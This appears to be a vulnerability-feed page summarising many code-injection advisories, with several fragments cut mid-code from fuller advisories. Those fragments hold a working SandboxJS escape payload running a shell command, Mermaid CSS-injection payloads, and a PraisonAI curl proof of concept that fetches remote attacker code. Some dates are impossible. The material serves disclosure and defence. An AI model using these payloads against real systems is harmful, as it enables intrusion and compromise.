Code Injection

Improper neutralization in OX Dovecot Pro's safe filter allows injection attacks when variable expansion is used, bypassing input sanitization on subsequent pipelines. Network-accessible attackers can exploit this filter logic flaw to inject malicious SQL or LDAP queries during authentication workflows, potentially enabling unauthorized access or data exfiltration. CVSS 7.4 with network vector but high complexity. No public exploit code identified at time of analysis, though vendor advisory confirms the vulnerability enables SQL/LDAP injection in authentication contexts.

Code injection in SAP Application Server ABAP for SAP NetWeaver and ABAP Platform allows authenticated attackers to execute arbitrary code for subscribed channel users by sending specially crafted inputs. The vulnerability has low integrity impact with no confidentiality or availability consequences. CVSS 4.3 (low severity) reflects the requirement for authenticated access, but the ability to affect other users elevates practical risk in multi-tenant environments.

Arbitrary code execution in optimate's neural_magic_training.py allows remote attackers to execute Python code by supplying a malicious directory path containing a crafted module.py file. The _load_model() function directly executes file contents via Python's exec() without validation. CVSS 9.8 reflects network vector with no authentication, but EPSS score of 0.02% (5th percentile) indicates very low observed exploitation probability. No active exploitation confirmed (not in CISA KEV). Vulnerability exists in commit a6d302f912b481c94370811af6b11402f51d377f from July 2024. Affects organizations using optimate for neural network model optimization.

Remote code execution in Adversarial Robustness Toolbox (ART) versions through 1.20.1 allows unauthenticated network attackers to execute arbitrary Python code via unsafe eval() usage in the Kubeflow robustness evaluation component. The vulnerability accepts unsanitized user input for LossFn and Optimizer parameters in PyTorch model evaluations, enabling complete system compromise. With CVSS 9.8 but only 0.06% EPSS score (18th percentile), this represents a severe theoretical risk that has not yet manifested in widespread exploitation. No public exploit code identified at time of analysis, and the vulnerability requires specific deployment of ART's Kubeflow integration component.

Remote code execution in Guardrails AI through version 0.6.7 occurs when installing validator packages via the Hub mechanism. The guardrails hub install command dynamically executes post-installation scripts from Hub manifests without validating the script path or content, allowing attackers who publish malicious packages to achieve arbitrary code execution on victim systems during package installation. With CVSS 9.8 (AV:N/AC:L/PR:N/UI:N) but only 0.06% EPSS (18th percentile), this represents a supply chain attack requiring user-initiated installation rather than widespread automated exploitation. No active exploitation confirmed (not in CISA KEV), and patch availability not confirmed from available data.

Remote code execution in Cognee v0.4.0 and earlier allows unauthenticated attackers to execute arbitrary Python code via the notebook cell execution API endpoint. The vulnerability stems from unsafe use of Python's exec() function without sandboxing or validation, enabling complete system compromise with server process privileges. While not actively exploited (not in KEV), the vulnerability is automatable with total technical impact per SSVC framework, though EPSS indicates low exploitation probability at 0.06%.

Arbitrary code execution occurs in the llm CLI tool (versions through 0.27.1) when attackers social-engineer victims into running crafted commands containing malicious Python code in the --functions argument. The tool directly executes this code via unsafe exec() without sanitization, enabling full system compromise. CVSS 9.8 assigns network attack vector and no authentication, but real-world exploitation requires local command execution by a tricked user, creating a significant disparity between the vector and actual attack prerequisites. EPSS score of 0.02% (5th percentile) suggests minimal automated exploitation risk, and no active exploitation or public POC has been identified at time of analysis.

Remote code execution in Kubectl MCP Server v1.1.1 allows unauthenticated network attackers to execute arbitrary commands on systems running the vulnerable server through crafted HTML-based exploitation vectors. Despite a critical 9.8 CVSS score, EPSS rates exploitation likelihood at only 0.02% (4th percentile), suggesting limited real-world targeting thus far. The vulnerability is classified as CWE-94 (Code Injection), affecting an open-source Model Context Protocol (MCP) server implementation for Kubernetes management. No CISA KEV listing indicates absence of confirmed widespread exploitation at time of analysis.

Remote code execution in PySyft Datasite/Server versions 0.9.5 and earlier allows unauthenticated attackers to execute arbitrary Python code on the server through the function submission mechanism. The vulnerability stems from insufficient validation and sandboxing of user-submitted Python functions decorated with @sy.syft_function(), which are executed using unsafe exec() and eval() calls after approval. With an EPSS score of 0.04% and no current KEV listing, this appears to be a high-severity vulnerability without confirmed active exploitation.

Remote code execution in superduper (Python library) through version 0.10.0 allows unauthenticated network attackers to execute arbitrary system commands by submitting malicious query strings with embedded Python code. The _parse_op_part() function in query.py uses unsafe eval() with inadequate context restrictions, enabling attackers to import modules (such as os) and achieve complete server compromise. EPSS score is low (0.07%, 20th percentile) and no active exploitation is confirmed (CISA KEV absent), but SSVC framework rates technical impact as total. User interaction is required (CVSS UI:R), reducing automated exploitation risk. Authentication requirements not confirmed from available data - CVSS vector shows PR:N (no privileges required) but UI:R suggests user-triggered queries.

HTTP::Tiny versions before 0.093 for Perl fail to validate carriage return and line feed (CRLF) characters in HTTP request lines and header values, allowing attackers who control input URLs or headers to inject additional HTTP headers and smuggle requests to upstream servers. Remote unauthenticated attackers can exploit this via crafted URLs passed to webhook or URL fetch endpoints, achieving limited information disclosure and integrity compromise. EPSS score of 0.03% (percentile 7%) indicates low practical exploitation probability despite network-vector accessibility.

{ return f.caller } ``` That leaks the host-side callback that invoked the sandbox function. This leaked callback is the internal `LispType.Call` op, which is registered in [call.ts](https://github.com/nyariv/SandboxJS/blob/1e6785658c94f5f2fb8e4a02cfcf1e7821b8be7f/src/executor/ops/call.ts#L16-L17). The leaked callback accepts a **params** object from the attacker and uses its fields without any authentication checks. if you looked at those branches [call.ts:47](https://github.com/nyariv/SandboxJS/blob/1e6785658c94f5f2fb8e4a02cfcf1e7821b8be7f/src/executor/ops/call.ts#L47-L55), [call.ts:70](https://github.com/nyariv/SandboxJS/blob/1e6785658c94f5f2fb8e4a02cfcf1e7821b8be7f/src/executor/ops/call.ts#L70), [call.ts:149](https://github.com/nyariv/SandboxJS/blob/1e6785658c94f5f2fb8e4a02cfcf1e7821b8be7f/src/executor/ops/call.ts#L149-L153). This means the attacker controls `obj.context`, `obj.prop`, `obj.get`, `context.evals.get` and `a`. This can lead to direct invocation of an internal primitive with forged operands ```js const sandb = require('@nyariv/sandboxjs').default; const sand = new sandb(); const payload = ` const callOp = (function fn() { return fn.caller; })(); function makeContext(capture = () => {}) { return { ctx: { options: 0 }, evals: { get: capture } }; } function leakStatic(obj, prop) { let leaked; callOp({ done() {}, a() {}, b: [], obj: { context: obj, prop, get() {} }, context: makeContext((fn) => (leaked = fn, () => 1)) }); return leaked; } function callDirect(fn, args) { let value; callOp({ done(_, result) { value = result; }, a() {}, b: args, obj: fn, context: makeContext() }); return value; } callDirect(leakStatic(Object, 'defineProperty'), [ leakStatic, 'call', callDirect(leakStatic(Object, 'getOwnPropertyDescriptor'), [ callDirect(leakStatic(Object, 'getPrototypeOf'), [() => 0]), 'constructor' ]) ]); let hostFn; callOp({ done(_, result) { hostFn = result; }, a: leakStatic, b: [], obj: { context: 'return process.getBuiltinModule("child_process").execSync("whoami").toString()', get() {} }, context: makeContext() }); return hostFn(); `; console.log(sand.compile(payload)().run()); ``` _Sandbox escape leads to RCE_

{init: {"fontFamily": "x;a{b} :not(&){background:green !important} c{d}"}}%% flowchart LR A --> B ``` The injected CSS exploits stylis's `&` (scope reference) handling. `:not(&)` escapes the `#mermaid-xxx` automatic scoping, applying styles to all page elements. Global at-rules (`@font-face`, `@keyframes`, `@counter-style`) are also injectable as stylis hoists them to top level. This allows page defacement and DOM attribute exfiltration via CSS `:has()` selectors. - [v11.15.0](https://github.com/mermaid-js/mermaid/releases/tag/mermaid%4011.15.0) (see [64769738d5b59211e1decb471ffbaca8afec51aa](https://github.com/mermaid-js/mermaid/commit/64769738d5b59211e1decb471ffbaca8afec51aa)) - [v10.9.6](https://github.com/mermaid-js/mermaid/releases/tag/v10.9.6) (see [a9d9f0d8eb790349121508688cd338253fd80d76](https://github.com/mermaid-js/mermaid/commit/a9d9f0d8eb790349121508688cd338253fd80d76)) If you can't upgrade mermaid, you can set the [`secure`](https://mermaid.js.org/config/schema-docs/config.html#secure) config value in the mermaid config to avoid allowing diagrams to modify `fontFamily`, `themeCSS`, `altFontFamily`, and `themeVariables`. Setting [`"securityLevel": "sandbox"`](https://mermaid.js.org/config/schema-docs/config.html#securitylevel) will also prevent this. Reported by @zsxsoft on behalf of @KeenSecurityLab

{x:x;y:y;overflow:visible!important;contain:none!important;transform:none!important;filter:none!important;clip-path:none!important}</style><div style="x:x;y:y;color:red;font:5em/1 monospace;display:grid;place-items:center;z-index:2147483647;width:100vw;height:100vh;position:fixed;top:0;left:0;background:black">HACKED</div><svg><style>a:b [*] --> A:::xss ``` - [v11.15.0](https://github.com/mermaid-js/mermaid/releases/tag/mermaid%4011.15.0) (see [37ff937f1da2e19f882fd1db01235db4d01f4056](https://github.com/mermaid-js/mermaid/commit/37ff937f1da2e19f882fd1db01235db4d01f4056)) - [v10.9.6](https://github.com/mermaid-js/mermaid/releases/tag/v10.9.6) (see [4e2d512bf5bf6f9de1a8f0a48da78dc4d09ac4f3](https://github.com/mermaid-js/mermaid/commit/4e2d512bf5bf6f9de1a8f0a48da78dc4d09ac4f3)) If you can not update to a patched version, setting [`"securityLevel": "sandbox"`](https://mermaid.js.org/config/schema-docs/config.html#securitylevel) will prevent this, by rendering the mermaid diagram in a sandboxed `<iframe>`. Thanks to @zsxsoft from @KeenSecurityLab for reporting this vulnerability.

{ this.popState(); return 'CLASSDEF_STYLEOPTS' } ``` The value passes unsanitized through `addStyleClass()` -> `createCssStyles()` -> `style.innerHTML` (mermaidAPI.ts:418). A `}` in the value closes the generated CSS selector, and everything after becomes a new CSS rule on the page. ``` stateDiagram-v2 classDef x }*{ background-image: url("http://media.giphy.com/media/SggILpMXO7Xt6/giphy.gif")} ``` Live demo: <https://mermaid.live/edit#pako:eNpFjzFvgzAQhf-KdVNbEcBgMHhtlkqtOnSJKi8ONsYKBmRMlRTx3-skanvTfbp7996t0IxSAYPZC6_2Rmgn7O4rQ00v5nmvWnRG29OKjqI5aTcug9wZK7RiaHH9A4fO-4kliVXSiFibqbvEzWjvnHxo_fI6vR3e6cGXyX2qTcvhcYMItDMSmHeLisAqZ8UVYeUDQhx8p6ziwEIrhTtx4MNVM4nhcxztrywE0h2wVvRzoGWS_z_8rahBKvcckntgmN5OAFvhDIzUNCZZQXCR5nVaZkUEF2BVFpOcEkoxxhUuyRbB980yjStapKHqoKFlhvPtB7BFZEU> This has been patched in: - [v11.15.0](https://github.com/mermaid-js/mermaid/releases/tag/mermaid%4011.15.0) (see [e9b0f34d8d82a6260077764ee45e1d7d90957a0f](https://github.com/mermaid-js/mermaid/commit/e9b0f34d8d82a6260077764ee45e1d7d90957a0f)) - [v10.9.6](https://github.com/mermaid-js/mermaid/releases/tag/v10.9.6) (see [8fead23c59166b7bab6a39eac81acebee2859102](https://github.com/mermaid-js/mermaid/commit/8fead23c59166b7bab6a39eac81acebee2859102)) Setting [`"securityLevel": "sandbox"`](https://mermaid.js.org/config/schema-docs/config.html#securitylevel) will prevent this, by rendering the mermaid diagram in a sandboxed `<iframe>`. Enables page defacement, user tracking via `url()` callbacks, and DOM attribute exfiltration via CSS `:has()` selectors.

OpenClaw before version 2026.4.20 fails to preserve untrusted labels on webhook-triggered cron agent output, allowing events to be recorded as trusted system events instead of untrusted events. This trust-labeling issue can strengthen prompt-injection attacks by rendering attacker-controlled webhook data as legitimate system events, though it does not directly bypass authentication, tool policy, or sandboxing controls.

OpenClaw versions 2026.4.5 through 2026.4.19 allow local attackers with user privileges to redirect credentialed MiniMax API requests to attacker-controlled servers via environment variable injection in workspace dotenv files, exposing MiniMax API keys in Authorization headers. The vulnerability requires user interaction (opening a malicious workspace) and local access but achieves high confidentiality impact by exfiltrating sensitive API credentials.

Remote code execution in OWASP BLT versions prior to 2.1.2 enables attackers to execute arbitrary code with repository write permissions via malicious GitHub pull requests. The vulnerability exploits a GitHub Actions workflow misconfiguration where pull_request_target triggers execute code directly from attacker-controlled forks without proper validation. EPSS data not available; no confirmed active exploitation (not in CISA KEV); publicly disclosed via GitHub Security Advisory GHSA-cgvj-qg2h-cqfh.

GuardDog versions 2.6.0 through 2.9.0 fail to escape terminal control characters in human-readable scan output, allowing malicious packages to inject ANSI or OSC escape sequences that can clear analyst terminals, rewrite CI logs, or inject spoofed content. The vulnerability affects file paths, code snippets, and messages parsed from package content and rendered directly to stdout without sanitization. Remote attackers can exploit this by distributing packages with specially crafted filenames or source code containing escape sequences, and requires only user interaction (running the scanner on the malicious package).

Remote code execution in angular-expressions versions ≤1.5.1 allows unauthenticated network attackers to escape the expression sandbox via malicious filter payloads and execute arbitrary system commands with no user interaction required. CVSS 9.3 (Critical) with confirmed public exploit code available. Vendor-released patch in version 1.5.2 addresses the sandbox escape. Affects applications using angular-expressions as a standalone module for evaluating user-supplied Angular.JS expressions.

{eval:...} syntax. An attacker can exploit this by providing a malicious configuration file, leading to arbitrary code execution when the training script is run with that configuration.

CosyVoice thru commit 6e01309e01bc93bbeb83bdd996b1182a81aaf11e (2025-30-21) contains an insecure deserialization vulnerability (CWE-502) in its model loading component. The framework uses torch.load() to load model weight files (e.g., llm.pt, flow.pt, hift.pt) without enabling the security-restrictive weights_only=True parameter. This allows the deserialization of arbitrary Python objects via the pickle module. An attacker can exploit this by providing a malicious model directory containing specially crafted model files. When a victim starts the CosyVoice Web UI pointing to this directory, arbitrary code is executed on the victim's system during the model loading process.

Remote code execution in QuickJS-NG 0.12.1 allows unauthenticated network attackers to execute arbitrary code through the js_mapped_arguments_mark function. The vulnerability enables attackers to achieve code injection with low confidentiality, integrity, and availability impact via network-accessible JavaScript engine exploitation. EPSS score of 0.02% (5th percentile) indicates very low predicted exploitation probability, and no active exploitation has been publicly reported at time of analysis.

The flash-attention training framework thru commit e724e2588cbe754beb97cf7c011b5e7e34119e62 (2025-13-04) contains an insecure deserialization vulnerability (CWE-502) in its checkpoint loading mechanism. The load_checkpoint() function in checkpoint.py and the checkpoint loading code in eval.py use torch.load() without enabling the security-restrictive weights_only=True parameter. This allows the deserialization of arbitrary Python objects via the pickle module. An attacker can exploit this by providing a maliciously crafted checkpoint file. When a victim loads this checkpoint during model warmstarting or evaluation, arbitrary code is executed on the victim's system.

Hex-Rays IDA Pro 9.2 and 9.3 before 9.3sp2 allows local code injection through argument injection in Clang dependency-file generation, enabling attackers to place malicious code into the plugins directory when a victim opens an attacker-supplied .i64 file. The vulnerability requires local access and user interaction (opening a malicious file) but grants high integrity and confidentiality impact. No public exploit code or CISA KEV status has been confirmed at the time of analysis.

Code injection in codelibs Fess up to 15.5.1 allows remote attackers with high privileges to execute arbitrary code via manipulation of the content argument in the AdminDesignAction.java JSP file handler. Publicly available exploit code exists for this vulnerability, and the vendor has not responded to early disclosure notification.

CSS declaration injection in Hono's JSX server-side renderer allows remote attackers to inject arbitrary CSS declarations via untrusted `style` object values or property names, enabling visual manipulation, outbound CSS requests to attacker hosts, and UI hijacking. Affects Hono versions before 4.12.18 when rendering JSX server-side with user-controlled style object inputs. No JavaScript execution or HTML breakout possible; impact limited to CSS scope.

Filter-expression injection in Spring AI's MilvusVectorStore allows remote unauthenticated attackers to manipulate vector database queries by injecting malicious filter expressions through unsanitized document IDs. Affects Spring AI 1.0.0-1.0.6 and 1.1.0-1.1.5. VMware has released patches in versions 1.0.7 and 1.1.6. CVSS 8.6 (High) with network attack vector and no privileges required. No active exploitation confirmed (not in CISA KEV) and no public POC identified at time of analysis.

Postiz is an AI social media scheduling tool. Prior to commit da44801, a "Pwn Request" vulnerability in the Build and Publish PR Docker Image workflow (.github/workflows/pr-docker-build.yml) allows any unauthenticated user to execute arbitrary code during the Docker build process and exfiltrate a highly privileged GITHUB_TOKEN (write-all permissions). This can be achieved simply by opening a Pull Request from a fork with a maliciously modified Dockerfile.dev. This issue has been patched via commit da44801.

Using Babel to compile code that was specifically crafted by an attacker can cause Babel to generate output code that executes arbitrary code. Known affected plugins are: - `@babel/plugin-transform-modules-systemjs` - `@babel/preset-env` when using the [`modules: "systemjs"` option](https://babel.dev/docs/babel-preset-env#modules), as it delegates to `@babel/plugin-transform-modules-systemjs` No other plugins under the `@babel` namespace are impacted. **Users that only compile trusted code are not impacted.** The vulnerability has been fixed in `@babel/plugin-transform-modules-systemjs@7.29.4`. Babel also released `@babel/preset-env@7.29.5`, updating its `@babel/plugin-transform-modules-systemjs` dependency, to simplify forcing the update if you are using `@babel/preset-env` directly. - Pin `@babel/parser` to v7.11.5. The downgrade will completely disable string module name parsing, but it would also disable other new language features and the build pipeline may fail as a result. Only do so if you are working on a legacy codebase and can not upgrade `@babel/plugin-transform-modules-systemjs` to v7.29.4. - Do not use the `modules: "systemjs"` option, migrate the codebase to native ES Modules or any other module formats. Babel thanks Daniel Cervera for reporting the vulnerability.

LDAP Filter Injection in Zitadel's identity provider implementation allows unauthenticated remote attackers to enumerate valid usernames and extract sensitive LDAP directory attributes through blind injection techniques. The vulnerability exists in Zitadel versions 2.71.11-2.71.19, 3.1.0-3.4.9, and 4.0.0-4.14.0 when LDAP is configured as an identity provider. Exploitation requires no authentication (CVSS PR:N) and has network attack vector (AV:N) with low complexity (AC:L), resulting in high confidentiality impact (C:H) but no authentication bypass capability. Vendor-released patches are available for 3.x (3.4.10) and 4.x (4.15.0) branches. No public exploit identified at time of analysis, though the attack technique is well-documented in security research.

SQL and CQL injection vulnerability in PraisonAI multi-agent teams system versions 2.4.1 through 4.6.33 allows authenticated attackers to execute arbitrary SQL or CQL commands by injecting malicious collection names into knowledge-store implementations. The vulnerability affects applications that pass untrusted collection names to optional SQL/CQL-backed storage backends, enabling data exfiltration, modification, or deletion with low complexity exploitation.

Remote code execution in ai-scanner versions 1.0.0 through 1.4.0 allows authenticated attackers to inject and execute arbitrary JavaScript code via the BrowserAutomation::PlaywrightService component. The vulnerability has a Critical CVSS score of 9.9 with scope change, enabling cross-boundary compromise of confidentiality, integrity, and availability. Vendor-released patch available in version 1.4.1 as of April 13, 2026, with GitHub Security Advisory GHSA-r27j-xxgx-f5vr confirming the fix.

Remote code execution in math-codegen npm package versions prior to 0.4.3 allows unauthenticated attackers to execute arbitrary system commands via string literal injection into the cg.parse() function. The vulnerability stems from unsanitized string literals being injected directly into new Function() bodies, enabling full command execution on any application exposing math evaluation endpoints that process user input. EPSS score not available, but this is a critical unauthenticated RCE requiring no special conditions beyond user input reaching the vulnerable parser. Vendor-released patch available in version 0.4.3.

Memory access violations occur in Linux kernel on Xilinx ZynqMP systems when OP-TEE device tree nodes are manually defined, preventing U-Boot's OP-TEE injection logic from properly inserting reserved-memory nodes. This affects Linux kernel versions 6.9 through 7.0 on ARM64 ZynqMP platforms, allowing local authenticated users to cause denial of service through runtime memory access faults. Vendor-released patches are available across multiple stable branches (6.12.75, 6.18.16, 6.19.6, 7.0).

Remote code execution in SEPPmail Secure Email Gateway versions prior to 15.0.2.1 enables unauthenticated attackers to execute arbitrary Perl code via the GINA UI. The vulnerability stems from an endpoint passing unsanitized user input directly to Perl's eval function, allowing complete system compromise. Reported by Switzerland's national CERT (NCSC.ch), this represents a critical pre-authentication attack surface requiring immediate patching.

Remote code execution in Apache CloudStack allows authenticated account users to execute arbitrary code on KVM hypervisor hosts by registering malicious templates with unsanitized filenames. Affects CloudStack 4.11.0 through 4.20.2.0 and 4.21.0.0 through 4.22.0.0 when using KVM hypervisors. Despite high CVSS (8.8), EPSS exploitation probability is very low (0.04%, 11th percentile) and CISA SSVC reports no active exploitation. Vendor-released patches are available in versions 4.20.3.0 and 4.22.0.1.

1C-Bitrix through 25.100.500 allows Remote Code Execution because an actor with SOURCE/WRITE permissions for the Translate Module can upload and execute code by sending a PHP file and a .htaccess file. NOTE: this is disputed by the Supplier because this is intended behavior for the high-privileged users who can upload new translated pages to the website.

Remote code execution in FacturaScripts through authenticated file upload allows attackers with valid credentials to bypass MIME type validation by prepending GIF89a magic bytes to PHP files, resulting in executable files stored in a web-accessible directory. An attacker can upload a malicious PHP file disguised as a GIF image via the product image upload functionality, then directly execute arbitrary commands on the server. The vulnerability affects versions 2025.81 and earlier; publicly available proof-of-concept code exists demonstrating end-to-end exploitation.

Command injection in Notepad Next versions prior to 0.14 allows arbitrary code execution when opening a specially crafted file. The detectLanguageFromExtension() function directly interpolates file extensions into a Lua script without sanitization, and because the full Lua standard libraries (os, io, package) are unconditionally loaded, an attacker can execute system commands by embedding Lua code in a malicious filename. Vendor-released patch available in version 0.14 (commit f3ca1b10). EPSS data not available; no CISA KEV listing indicates no confirmed widespread exploitation at time of analysis.

Remote code execution in Firefox ESR's WebRTC component allows unauthenticated network attackers to achieve arbitrary code execution with complete system compromise. The vulnerability affects Firefox ESR versions prior to 140.10.2 and carries a critical CVSS score of 9.8 with network attack vector requiring no authentication or user interaction. Despite the critical severity, EPSS probability remains exceptionally low at 0.01% (0th percentile) with no evidence of active exploitation, suggesting limited awareness or exploitation complexity despite the automatable nature assessed by CISA SSVC framework.

Server-Side Template Injection in Open Notebook v1.8.3 enables arbitrary Python code execution and OS command execution within the Docker container through unsanitized user input in transformation features. The vulnerability requires local access (CVSS AV:L) but no authentication or user interaction, making it exploitable by any application user with access to the transformation creation interface. No public exploit code identified at time of analysis, though the GitHub security advisory provides technical details for reproduction.

Remote code execution in Hitachi Virtual Storage Platform G, F, E, and One Block series allows unauthenticated network attackers to execute arbitrary code on storage controllers and maintenance consoles with low impact across confidentiality, integrity, and availability due to changed scope (CVSS 8.3, CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C). The vulnerability affects the Storage Navigator interface and maintenance console across multiple VSP product lines spanning enterprise and mid-range storage arrays. EPSS data not available; no evidence of active exploitation or public POC at time of analysis. Vendor-released patches available with specific firmware versions required for each product family.

Remote code execution in Hugging Face diffusers library (all versions < 0.38.0) bypasses the trust_remote_code=False security gate when users load models via DiffusionPipeline.from_pretrained. Three distinct attack vectors exist: cross-repository custom_pipeline parameters, local snapshots combined with Hub custom_pipeline references, and local snapshots containing malicious custom component files. The vulnerability stems from implementing the trust_remote_code check in DiffusionPipeline.download() instead of at the actual dynamic module load point, allowing multiple code paths to skip the security control entirely. Vendor-released patch: diffusers 0.38.0 (confirmed by GitHub advisory GHSA-98h9-4798-4q5v and PR #13448). No public exploit identified at time of analysis; exploitation requires user interaction (loading a model from an attacker-controlled source).

vm2 npm package versions 3.9.6 through 3.10.5 allow sandbox escape through prototype pollution of host-realm intrinsic objects. Attackers execute arbitrary code by leveraging flawed proxy bridge implementation that writes sandbox mutations directly to shared host Object.prototype, Array.prototype, and Function.prototype instead of isolating changes to the sandbox realm. This vulnerability was patched in vm2 v3.11.0 as part of a coordinated release addressing 13 security advisories. Publicly available exploit code exists with minimal attack complexity (CVSS AC:L) requiring no authentication or user interaction (AV:N/PR:N/UI:N).

Remote code execution in vm2 Node.js sandbox library (versions ≤3.10.5) allows attackers to escape isolation and execute arbitrary system commands by exploiting incomplete host Object protections. Attackers leverage JavaScript prototype chain manipulation to obtain host-context symbols, enabling injection of malicious code into Node.js inspection routines. Publicly available exploit code exists with working proof-of-concept demonstrating command execution via child_process. CVSS 10.0 (Critical) with network attack vector and no authentication required. Fixed in vm2 3.11.0, part of coordinated release addressing 13 sandbox-escape vulnerabilities.

Prototype chain manipulation in vm2 Node.js sandbox library enables complete sandbox escape and remote code execution via util.inspect handler leakage. Attackers can exploit BaseHandler.getPrototypeOf through crafted objects to access host process primitives and execute arbitrary system commands. Public exploit code exists (vendor-published PoC demonstrates child_process.execSync execution). Fixed in vm2 version 3.11.0 alongside 12 other critical sandbox escape vulnerabilities in coordinated security release.

Internal infrastructure disclosure in the free5GC UDM network function (Go package github.com/free5gc/udm, versions <= v1.4.2) lets unauthenticated remote attackers leak the internal address and API layout of the UDR. Six GET handlers in the nudm-sdm Subscriber Data Management service skip the validator.IsValidSupi() check, so a SUPI path parameter containing control characters (e.g. a NULL byte) propagates into the UDM-to-UDR URL, breaks Go's net/url parser, and is echoed back inside a 500 SYSTEM_FAILURE error detail. Publicly available exploit code exists (a curl-based PoC is published in the advisory and CVSS marks exploit maturity as Proof-of-Concept), but it is not listed in CISA KEV and no EPSS score was provided; impact is limited to confidentiality of infrastructure metadata that aids further intrusion rather than direct data theft or code execution.

CSS Parser gem disables HTTPS certificate validation by setting OpenSSL::SSL::VERIFY_NONE, allowing man-in-the-middle attackers to inject or modify CSS content loaded via HTTPS. Any application using CSS Parser versions prior to 2.1.0 to fetch external stylesheets over HTTPS can be exploited by network-positioned attackers without authentication. A proof-of-concept using mitmproxy or Burp Suite demonstrates practical exploitation; CVSS 5.8 reflects the network attack vector and integrity impact, but real-world risk depends on whether the application loads stylesheets from untrusted or attacker-controllable URLs and whether the attacker can intercept network traffic.

NPM package next-npm-version1.0.1 is vulnerable to Command injection.

ChestnutCMS v1.5.10 has a SQL injection vulnerability. The content parameter of the cms_content tag can be manipulated in the admin backend and injected into a SQL query when the template is rendered.

{"recipe": "<abs path>" | "github:<owner>/<repo>/<recipe>"} │ ▼ recipe/serve.py:483 run_recipe(request) ← auth=none default │ ▼ recipe/core.py:215 recipe.run(name, ...) │ ▼ recipe/core.py:686 _load_recipe(name) └─ ".." check only; absolute paths and URIs allowed │ ▼ templates/loader.py:94 TemplateLoader.load(uri) │ ▼ templates/security.py:130 is_source_allowed("github:*") └─ allow_any_github=True default → returns True │ ▼ templates/registry.py fetch repo from raw.githubusercontent.com → cache dir │ ▼ templates/security.py:215 validate_template_directory(cached.path) └─ .py is in allowed_extensions → tools.py kept │ ▼ recipe/core.py:887 _execute_recipe(recipe_config, ...) │ ▼ recipe/core.py:943 create_tool_registry_with_overrides( include_defaults=True, template_dir=recipe_config.path) │ ▼ templates/tool_override.py:341-349 load_from_file(template_dir/tools.py) │ ▼ templates/tool_override.py:94 spec.loader.exec_module(module) ← RCE ``` The tool registry build runs *before* any LLM/agent step, so `OPENAI_API_KEY` and similar are not required. A recipe with an empty `workflow.steps: []` is sufficient - the payload fires during registry construction. ``` SERVER stdout (PID 43784): Uvicorn running on http://127.0.0.1:8765 127.0.0.1 - POST /v1/recipes/run HTTP/1.1 [CVE-2026-40287-bypass] RCE fired. Marker written to: …/praisonai_pwn_1777094071.txt 127.0.0.1 - "POST /v1/recipes/run" 500 Internal Server Error Marker file: pid: 43784 ← matches server PID argv: ['server.py'] ← server process, not exploit ``` The 500 response is a downstream side-effect of `workflow.steps: []` failing to construct a runnable workflow; the `exec_module(tools.py)` call runs *before* that error. The attacker payload has already executed in the server process by the time the 500 is sent. Files under `pocs/praisonai-cve-2026-40287-bypass/`: - [evil_recipe/TEMPLATE.yaml](https://github.com/user-attachments/files/27079207/TEMPLATE.yaml) - minimal recipe metadata - [evil_recipe/tools.py](https://github.com/user-attachments/files/27079210/tools.py) - payload (writes a marker file in tempdir) - [server.py](https://github.com/user-attachments/files/27079211/server.py) - starts `praisonai.recipe.serve.create_app({})` on `127.0.0.1:8765` (default `auth: none`) - [exploit.py](https://github.com/user-attachments/files/27079214/exploit.py) - single POST to `/v1/recipes/run` ```bash pip install 'praisonai[serve]==4.6.31' python server.py python exploit.py ``` Expected: server stdout shows `[CVE-2026-40287-bypass] RCE fired.`; a `praisonai_pwn_<timestamp>.txt` file appears in the system temp directory containing user, host, pid, cwd captured from inside the server process. ```bash curl -X POST http://target:8765/v1/recipes/run \ -H 'Content-Type: application/json' \ -d '{"recipe":"github:<you>/poc-recipe/poc-recipe"}' ``` No filesystem prerequisite on the target. Triggers because `SecurityConfig.allow_any_github` (templates/security.py:30) defaults to `True`.

Arbitrary code execution via Git hook redirection in GitPython 3.1.48 and earlier allows local authenticated users to inject malicious core.hooksPath configuration through newline characters in config_writer().set_value(). Publicly available exploit code exists. The vulnerability enables persistent repository poisoning where attacker-controlled hooks execute with the privileges of any user performing Git operations (commit, merge, checkout) on the poisoned repository. Particularly dangerous in multi-tenant environments like MLRun, DVC, MLflow, or Kedro where shared repositories enable privilege escalation across user contexts. Fixed in GitPython 3.1.49.

Spring Expression Language injection in Valtimo (open-source business process platform) allows authenticated ADMIN users to execute arbitrary OS commands and exfiltrate credentials. The vulnerability exists in DocumentMigrationService (versions 12.0.0-12.31.0 and 13.0.0-13.22.0) and the Condition framework (13.4.0-13.22.0), both of which use StandardEvaluationContext to evaluate user-supplied SpEL expressions without restrictions. Attackers can invoke Runtime.exec(), access environment variables containing database passwords and API keys, and load arbitrary Java classes. Vendor-released patches are available (12.32.0, 13.23.0). No public exploit identified at time of analysis, EPSS data not available.

Remote code execution in Scramble API documentation generator versions 0.13.2 through 0.13.21 allows unauthenticated attackers to execute arbitrary PHP code when documentation endpoints are publicly accessible and validation rules reference user-controlled input. Fixed in version 0.13.22. The CVSS score of 9.4 (Critical) reflects the network-accessible, low-complexity attack requiring no authentication, though exploitation requires specific configuration where documentation endpoints remain enabled and validation rules incorporate request-supplied data. No active exploitation (CISA KEV) or public POC identified at time of analysis, but the GitHub security advisory provides full technical details enabling reproduction.

LDAP filter injection in Netflix Lemur certificate management platform allows authenticated users with valid LDAP credentials to escalate privileges to administrator by injecting metacharacters into the username field during login. Attackers manipulate group membership queries to gain unauthorized admin roles, enabling access to all certificates, private keys via /certificates/<id>/key endpoint, and CA configurations. Vendor-released patch confirmed in version 1.9.0 (GitHub advisory GHSA-3r34-vq8m-39gh). CVSS 8.1 indicates high confidentiality and integrity impact with low attack complexity from network-authenticated attackers. No public exploit code identified at time of analysis, though detailed reproduction steps exist in the advisory.

Script injection in UI in Google Chrome prior to 148.0.7778.96 allowed a remote attacker who convinced a user to engage in specific UI gestures to inject arbitrary scripts or HTML (UXSS) via a crafted HTML page. (Chromium security severity: Low)

Unvalidated Omnibox input in Google Chrome prior to version 148.0.7778.96 enables remote attackers to inject arbitrary scripts and HTML (universal XSS) via malicious network traffic, affecting users who click on crafted links. The vulnerability requires user interaction but crosses security boundaries due to its scope impact. No active exploitation has been publicly confirmed, though a patch is available from Google.

Insufficient input validation in Google Chrome on Android prior to version 148.0.7778.96 allows local attackers to inject arbitrary scripts or HTML via a crafted Chrome Extension, leading to Universal Cross-Site Scripting (UXSS). The vulnerability requires user interaction and local system access but poses a medium risk due to its ability to bypass same-origin policy protections within the browser context. No public exploit has been identified at the time of analysis.

